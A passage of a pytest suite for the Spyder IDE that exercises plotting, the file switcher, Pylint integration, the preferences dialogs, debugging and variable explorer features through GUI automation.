"""Test that %varexp is working while debugging."""
nsb = main_window.variableexplorer.get_focus_widget()
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
# Load test file to be able to enter in debugging mode
test_file = osp.join(LOCATION, 'script.py')
main_window.editor.load(test_file)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Click the debug button
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Get to an object that can be plotted
for _ in range(2):
qtbot.keyClicks(control, 'n')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Generate the plot from the Variable Explorer
nsb.editor.plot('li', 'plot')
qtbot.wait(1000)
# Assert that there's a plot in the console
assert shell._control.toHtml().count('img src') == 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 1)},
{'spy_config': ('ipython_console', 'pylab/inline/figure_format', 0)}],
indirect=True)
def test_plots_plugin(main_window, qtbot, tmpdir, mocker):
"""
Test that plots generated in the IPython console are properly displayed
in the plots plugin.
"""
assert CONF.get('plots', 'mute_inline_plotting') is False
shell = main_window.ipyconsole.get_current_shellwidget()
figbrowser = main_window.plots.current_widget()
# Wait until the window is fully up.
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate a plot inline.
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig = plt.plot([1, 2, 3, 4], '.')\n"))
if CONF.get('ipython_console', 'pylab/inline/figure_format') == 0:
assert figbrowser.figviewer.figcanvas.fmt == 'image/png'
else:
assert figbrowser.figviewer.figcanvas.fmt == 'image/svg+xml'
# Get the image name from the html, fetch the image from the shell, and
# save it as a png.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
ipython_figname = osp.join(to_text_string(tmpdir), 'ipython_img.png')
ipython_qimg = shell._get_image(img_name)
ipython_qimg.save(ipython_figname)
# Save the image with the Plots plugin as a png.
plots_figname = osp.join(to_text_string(tmpdir), 'plots_img.png')
mocker.patch('spyder.plugins.plots.widgets.figurebrowser.getsavefilename',
return_value=(plots_figname, '.png'))
figbrowser.save_figure()
assert compare_images(ipython_figname, plots_figname, 0.1) is None
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2, reason="It times out sometimes")
def test_tight_layout_option_for_inline_plot(main_window, qtbot, tmpdir):
"""
Test that the option to set bbox_inches to 'tight' or 'None' is
working when plotting inline in the IPython console. By default, figures
are plotted inline with bbox_inches='tight'.
"""
tmpdir = to_text_string(tmpdir)
# Assert that the default is True.
assert CONF.get('ipython_console', 'pylab/inline/bbox_inches') is True
fig_dpi = float(CONF.get('ipython_console', 'pylab/inline/resolution'))
fig_width = float(CONF.get('ipython_console', 'pylab/inline/width'))
fig_height = float(CONF.get('ipython_console', 'pylab/inline/height'))
# Wait until the window is fully up.
shell = main_window.ipyconsole.get_current_shellwidget()
client = main_window.ipyconsole.get_current_client()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Give focus to the widget that's going to receive clicks
control = main_window.ipyconsole.get_focus_widget()
control.setFocus()
# Generate a plot inline with bbox_inches=tight (since it is default) and
# save the figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_tight.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches='tight',\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_tight.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
# Change the option so that bbox_inches=None.
CONF.set('ipython_console', 'pylab/inline/bbox_inches', False)
# Restart the kernel and wait until it's up again
shell._prompt_html = None
client.restart_kernel()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Generate the same plot inline with bbox_inches='tight' and save the
# figure with savefig.
savefig_figname = osp.join(
tmpdir, 'savefig_bbox_inches_None.png').replace('\\', '/')
with qtbot.waitSignal(shell.executed):
shell.execute(("import matplotlib.pyplot as plt\n"
"fig, ax = plt.subplots()\n"
"fig.set_size_inches(%f, %f)\n"
"ax.set_position([0.25, 0.25, 0.5, 0.5])\n"
"ax.set_xticks(range(10))\n"
"ax.xaxis.set_ticklabels([])\n"
"ax.set_yticks(range(10))\n"
"ax.yaxis.set_ticklabels([])\n"
"ax.tick_params(axis='both', length=0)\n"
"for loc in ax.spines:\n"
" ax.spines[loc].set_color('#000000')\n"
" ax.spines[loc].set_linewidth(2)\n"
"ax.axis([0, 9, 0, 9])\n"
"ax.plot(range(10), color='#000000', lw=2)\n"
"fig.savefig('%s',\n"
" bbox_inches=None,\n"
" dpi=%f)"
) % (fig_width, fig_height, savefig_figname, fig_dpi))
# Get the image name from the html, fetch the image from the shell, and
# then save it to a file.
html = shell._control.toHtml()
img_name = re.search('''<img src="(.+?)" /></p>''', html).group(1)
qimg = shell._get_image(img_name)
assert isinstance(qimg, QImage)
# Save the inline figure and assert it is similar to the one generated
# with savefig.
inline_figname = osp.join(tmpdir, 'inline_bbox_inches_None.png')
qimg.save(inline_figname)
assert compare_images(savefig_figname, inline_figname, 0.1) is None
@flaky(max_runs=3)
@pytest.mark.slow
def test_switcher(main_window, qtbot, tmpdir):
"""Test the use of shorten paths when necessary in the switcher."""
switcher = main_window.switcher
# Assert that the full path of a file is shown in the switcher
file_a = tmpdir.join('test_file_a.py')
file_a.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file_a))
main_window.open_switcher()
switcher_paths = [switcher.model.item(item_idx).get_description()
for item_idx in range(switcher.model.rowCount())]
assert osp.dirname(str(file_a)) in switcher_paths or len(str(file_a)) > 75
switcher.close()
# Assert that long paths are shortened in the switcher
dir_b = tmpdir
for _ in range(3):
dir_b = dir_b.mkdir(str(uuid.uuid4()))
file_b = dir_b.join('test_file_b.py')
file_b.write('bar\n')
main_window.editor.load(str(file_b))
main_window.open_switcher()
file_b_text = switcher.model.item(
switcher.model.rowCount() - 1).get_description()
assert '...' in file_b_text
switcher.close()
# Assert search works correctly
search_texts = ['test_file_a', 'file_b', 'foo_spam']
expected_paths = [file_a, file_b, None]
for search_text, expected_path in zip(search_texts, expected_paths):
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, search_text)
qtbot.wait(200)
assert switcher.count() == bool(expected_path)
switcher.close()
# Assert symbol switcher works
main_window.editor.set_current_filename(str(file_a))
main_window.open_switcher()
qtbot.keyClicks(switcher.edit, '@')
qtbot.wait(200)
assert switcher.count() == 2
switcher.close()
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_switcher_dlg(main_window, tmpdir):
"""
Test that the file switcher is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file_open_switcher_dlg.py')
file.write("a test file for test_edidorstack_open_switcher_dlg")
main_window.editor.load(str(file))
# Test that the file switcher opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_switcher_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert (editorstack.switcher_dlg.count() ==
len(main_window.editor.get_filenames()))
@flaky(max_runs=3)
@pytest.mark.slow
def test_edidorstack_open_symbolfinder_dlg(main_window, qtbot, tmpdir):
"""
Test that the symbol finder is working as expected when called from the
editorstack.
Regression test for spyder-ide/spyder#10684
"""
# Add a file to the editor.
file = tmpdir.join('test_file.py')
file.write('''
def example_def():
pass
def example_def_2():
pass
''')
main_window.editor.load(str(file))
# Test that the symbol finder opens as expected from the editorstack.
editorstack = main_window.editor.get_current_editorstack()
assert editorstack.switcher_dlg is None
editorstack.open_symbolfinder_dlg()
assert editorstack.switcher_dlg
assert editorstack.switcher_dlg.isVisible()
assert editorstack.switcher_dlg.count() == 2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Times out sometimes on macOS")
def test_run_static_code_analysis(main_window, qtbot):
"""This tests that the Pylint plugin is working as expected."""
# Select the third-party plugin
pylint_plugin = get_thirdparty_plugin(main_window, "Code Analysis")
# Do an analysis
test_file = osp.join(LOCATION, 'script_pylint.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
qtbot.keyClick(code_editor, Qt.Key_F8)
qtbot.wait(3000)
# Perform the test
# Check output of the analysis
treewidget = pylint_plugin.get_focus_widget()
qtbot.waitUntil(lambda: treewidget.results is not None,
timeout=SHELL_TIMEOUT)
result_content = treewidget.results
assert result_content['C:']
pylint_version = LooseVersion(pylint.__version__)
if pylint_version < LooseVersion('2.5.0'):
number_of_conventions = 5
else:
number_of_conventions = 3
assert len(result_content['C:']) == number_of_conventions
# Close the file
main_window.editor.close_file()
@flaky(max_runs=3)
def test_troubleshooting_menu_item_and_url(monkeypatch):
"""Test that the troubleshooting menu item calls the valid URL."""
MockMainWindow = MagicMock(spec=MainWindow)
mockMainWindow_instance = MockMainWindow()
mockMainWindow_instance.__class__ = MainWindow
MockQDesktopServices = Mock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.app.mainwindow.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Unit test of help menu item: Make sure the correct URL is called.
MainWindow.trouble_guide(mockMainWindow_instance)
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_once_with(__trouble_url__)
# Check that the URL resolves correctly. Ignored if no internet connection.
try:
urlopen("https://www.github.com", timeout=1)
except Exception:
pass
else:
try:
urlopen(__trouble_url__, timeout=1)
except URLError:
raise
@flaky(max_runs=3)
@pytest.mark.slow
@pytest.mark.skipif(os.name == 'nt', reason="It fails on Windows")
def test_help_opens_when_show_tutorial_full(main_window, qtbot):
"""
Test fix for spyder-ide/spyder#6317.
'Show tutorial' opens the help plugin if closed.
"""
HELP_STR = "Help"
help_pane_menuitem = None
for action in main_window.plugins_menu.actions():
if action.text() == HELP_STR:
help_pane_menuitem = action
break
# Test opening tutorial with Help plguin closed
main_window.help.toggle_view_action.setChecked(False)
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert help_tabbar is None and help_index is None
assert not isinstance(main_window.focusWidget(), ObjectComboBox)
assert not help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open, but not selected
help_tabbar.setCurrentIndex((help_tabbar.currentIndex() + 1)
% help_tabbar.count())
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index != help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
main_window.help.show_tutorial()
qtbot.wait(500)
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
# Test opening tutorial with help plugin open and the active tab
qtbot.wait(500)
main_window.help.show_tutorial()
help_tabbar, help_index = find_desired_tab_in_window(HELP_STR, main_window)
qtbot.wait(500)
assert None not in (help_tabbar, help_index)
assert help_index == help_tabbar.currentIndex()
assert help_pane_menuitem.isChecked()
def test_report_issue_url(monkeypatch):
"""Test that report_issue sends the data, and to correct url."""
body = 'This is an example error report body text.'
title = 'Uncreative issue title here'
body_autogenerated = 'Auto-generated text.'
target_url_base = __project_url__ + '/issues/new'
MockMainWindow = MagicMock(spec=MainWindow)
mockMainWindow_instance = MockMainWindow()
mockMainWindow_instance.__class__ = MainWindow
mockMainWindow_instance.render_issue.return_value = body_autogenerated
MockQDesktopServices = MagicMock()
mockQDesktopServices_instance = MockQDesktopServices()
attr_to_patch = ('spyder.app.mainwindow.QDesktopServices')
monkeypatch.setattr(attr_to_patch, MockQDesktopServices)
# Test when body != None, i.e. when auto-submitting error to Github
target_url = QUrl(target_url_base + '?body=' + body)
MainWindow.report_issue(mockMainWindow_instance, body=body, title=None,
open_webpage=True)
assert MockQDesktopServices.openUrl.call_count == 1
mockQDesktopServices_instance.openUrl.called_with(target_url)
# Test when body != None and title != None
target_url = QUrl(target_url_base + '?body=' + body
+ "&title=" + title)
MainWindow.report_issue(mockMainWindow_instance, body=body, title=title,
open_webpage=True)
assert MockQDesktopServices.openUrl.call_count == 2
mockQDesktopServices_instance.openUrl.called_with(target_url)
def test_render_issue():
"""Test that render issue works without errors and returns text."""
test_description = "This is a test description"
test_traceback = "An error occurred. Oh no!"
MockMainWindow = MagicMock(spec=MainWindow)
mockMainWindow_instance = MockMainWindow()
mockMainWindow_instance.__class__ = MainWindow
# Test when description and traceback are not provided
test_issue_1 = MainWindow.render_issue(mockMainWindow_instance)
assert type(test_issue_1) == str
assert len(test_issue_1) > 100
# Test when description and traceback are provided
test_issue_2 = MainWindow.render_issue(mockMainWindow_instance,
test_description, test_traceback)
assert type(test_issue_2) == str
assert len(test_issue_2) > 100
assert test_description in test_issue_2
assert test_traceback in test_issue_2
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
sys.platform.startswith('linux'), reason="It segfaults on Linux")
def test_custom_layouts(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
mw = main_window
mw.first_spyder_run = False
prefix = 'window' + '/'
settings = mw.load_window_settings(prefix=prefix, default=True)
# Test layout changes
for layout_idx in ['default'] + list(range(4)):
with qtbot.waitSignal(mw.sig_layout_setup_ready, timeout=5000):
layout = mw.setup_default_layouts(layout_idx, settings=settings)
with qtbot.waitSignal(None, timeout=500, raising=False):
# Add a wait to see changes
pass
widgets_layout = layout['widgets']
hidden_widgets = layout['hidden widgets']
for column in widgets_layout:
for row in column:
for idx, widget in enumerate(row):
if idx == 0:
if widget not in hidden_widgets:
print(widget) # spyder: test-skip
try:
# Old API
assert widget.isVisible()
except AttributeError:
# New API
assert widget.get_widget().isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
def test_save_on_runfile(main_window, qtbot):
"""Test that layout are showing the expected widgets visible."""
# Load test file
test_file = osp.join(LOCATION, 'script.py')
test_file_copy = test_file[:-3] + '_copy.py'
shutil.copyfile(test_file, test_file_copy)
main_window.editor.load(test_file_copy)
code_editor = main_window.editor.get_focus_widget()
# Verify result
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
qtbot.keyClicks(code_editor, 'test_var = 123', delay=100)
filename = code_editor.filename
with qtbot.waitSignal(shell.sig_prompt_ready):
shell.execute('runfile("{}")'.format(remove_backslashes(filename)))
assert shell.get_value('test_var') == 123
main_window.editor.close_file()
os.remove(test_file_copy)
@pytest.mark.slow
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_pylint_follows_file(qtbot, tmpdir, main_window):
"""Test that file editor focus change updates pylint combobox filename."""
for plugin in main_window.thirdparty_plugins:
if plugin.CONF_SECTION == 'pylint':
pylint_plugin = plugin
break
# Show pylint plugin
pylint_plugin.dockwidget.show()
pylint_plugin.dockwidget.raise_()
# Create base temporary directory
basedir = tmpdir.mkdir('foo')
# Open some files
for idx in range(2):
fh = basedir.join('{}.py'.format(idx))
fname = str(fh)
fh.write('print("Hello world!")')
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Create a editor split
main_window.editor.editorsplitter.split(orientation=Qt.Vertical)
qtbot.wait(500)
# Open other files
for idx in range(4):
fh = basedir.join('{}.py'.format(idx))
fh.write('print("Hello world!")')
fname = str(fh)
main_window.open_file(fh)
qtbot.wait(200)
assert fname == pylint_plugin.get_filename()
# Close split panel
for editorstack in reversed(main_window.editor.editorstacks):
editorstack.close_split()
break
qtbot.wait(1000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_report_comms_error(qtbot, main_window):
"""Test if a comms error is correctly displayed."""
CONF.set('main', 'show_internal_errors', True)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a bogus get_cwd
with qtbot.waitSignal(shell.executed):
shell.execute('def get_cwd(): import foo')
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm."
"register_call_handler('get_cwd', get_cwd)")
with qtbot.waitSignal(shell.executed, timeout=3000):
shell.execute('ls')
error_dialog = main_window.console.error_dialog
assert error_dialog is not None
assert 'Exception in comms call get_cwd' in error_dialog.error_traceback
assert 'No module named' in error_dialog.error_traceback
main_window.console.close_error_dialog()
CONF.set('main', 'show_internal_errors', False)
@pytest.mark.slow
@flaky(max_runs=3)
def test_break_while_running(main_window, qtbot, tmpdir):
"""Test that we can set breakpoints while running."""
# Create loop
code = ("import time\n"
"for i in range(100):\n"
" print(i)\n"
" time.sleep(0.1)\n"
)
p = tmpdir.join("loop_script.py")
p.write(code)
test_file = to_text_string(p)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Load test file
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# Click the debug button
qtbot.mouseClick(debug_button, Qt.LeftButton)
qtbot.wait(1000)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
# Continue debugging
qtbot.keyClick(shell._control, 'c')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
# Set a breakpoint
code_editor.debugger.toogle_breakpoint(line_number=3)
# We should drop into the debugger
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClick(shell._control, 'q')
qtbot.keyClick(shell._control, Qt.Key_Enter)
qtbot.wait(500)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# --- Preferences
# ----------------------------------------------------------------------------
def preferences_dialog_helper(qtbot, main_window, section):
"""
Open preferences dialog and select page with `section` (CONF_SECTION).
"""
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
index = dlg.get_index_by_name(section)
page = dlg.get_page(index)
dlg.set_current_index(index)
return dlg, index, page
@pytest.mark.slow
def test_preferences_checkboxes_not_checked_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10139 regression.
Enabling codestyle/docstyle on the completion section of preferences,
was not updating correctly.
"""
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
# Open completion prefences and update options
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'lsp-server')
# Get the correct tab pages inside the Completion preferences page
tnames = [page.tabs.tabText(i).lower() for i in range(page.tabs.count())]
tab_widgets = {
tnames.index('code style'): page.code_style_check,
tnames.index('docstring style'): page.docstring_style_check,
}
for idx, check in tab_widgets.items():
page.tabs.setCurrentIndex(idx)
check.animateClick()
qtbot.wait(500)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
# Check the menus are correctly updated
count = 0
for menu_item in main_window.source_menu_actions:
if menu_item and isinstance(menu_item, QAction):
print(menu_item.text(), menu_item.isChecked())
if 'code style' in menu_item.text():
assert menu_item.isChecked()
count += 1
elif 'docstring style' in menu_item.text():
assert menu_item.isChecked()
count += 1
assert count == 2
# Reset config
CONF.set('lsp-server', 'pycodestyle', False)
CONF.set('lsp-server', 'pydocstyle', False)
@pytest.mark.slow
def test_preferences_change_font_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#10284 regression.
Changing font resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'appearance')
for fontbox in [page.plain_text_font.fontbox,
page.rich_text_font.fontbox]:
fontbox.setFocus()
idx = fontbox.currentIndex()
fontbox.setCurrentIndex(idx + 1)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
def test_preferences_shortcut_reset_regression(main_window, qtbot):
"""
Test for spyder-ide/spyder/#11132 regression.
Resetting shortcut resulted in error.
"""
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'shortcuts')
page.reset_to_default(force=True)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
def test_preferences_change_interpreter(qtbot, main_window):
"""Test that on main interpreter change signal is emitted."""
# Check original pyls configuration
lsp = main_window.completions.get_client('lsp')
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] is None
assert jedi['extra_paths'] == []
# Change main interpreter on preferences
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
page.cus_exec_radio.setChecked(True)
page.cus_exec_combo.combobox.setCurrentText(sys.executable)
with qtbot.waitSignal(main_window.sig_main_interpreter_changed,
timeout=5000, raising=True):
dlg.ok_btn.animateClick()
# Check updated pyls configuration
config = lsp.generate_python_config()
jedi = config['configurations']['pyls']['plugins']['jedi']
assert jedi['environment'] == sys.executable
assert jedi['extra_paths'] == []
@pytest.mark.slow
def test_preferences_last_page_is_loaded(qtbot, main_window):
# Test that the last page is updated on re open
dlg, index, page = preferences_dialog_helper(qtbot, main_window,
'main_interpreter')
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
main_window.show_preferences()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is not None,
timeout=5000)
dlg = main_window.prefs_dialog_instance
assert dlg.get_current_index() == index
dlg.ok_btn.animateClick()
qtbot.waitUntil(lambda: main_window.prefs_dialog_instance is None,
timeout=5000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="It times out too much on Windows and macOS")
def test_go_to_definition(main_window, qtbot, capsys):
"""Test that go-to-definition works as expected."""
# --- Code that gives no definition
code_no_def = dedent("""
from qtpy.QtCore import Qt
Qt.FramelessWindowHint""")
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_no_def)
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to
# FramelessWindowHint
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
# Capture stderr and assert there are no errors
sys_stream = capsys.readouterr()
assert sys_stream.err == u''
# --- Code that gives definition
code_def = "import qtpy.QtCore"
# Create new editor with code and wait until LSP is ready
main_window.editor.new(text=code_def)
n_editors = len(main_window.editor.get_filenames())
code_editor = main_window.editor.get_focus_widget()
with qtbot.waitSignal(code_editor.lsp_response_signal, timeout=30000):
code_editor.document_did_open()
# Move cursor to the left one character to be next to QtCore
code_editor.move_cursor(-1)
with qtbot.waitSignal(code_editor.lsp_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: 'ipdb> continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert "1---> 2 print(1)" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_focus_widget()
if debug:
# Continue
qtbot.waitUntil(lambda: control.toPlainText().split()[-1] == 'ipdb>')
# Reach the 'name' input
shell.pdb_execute('c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.get_focus_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
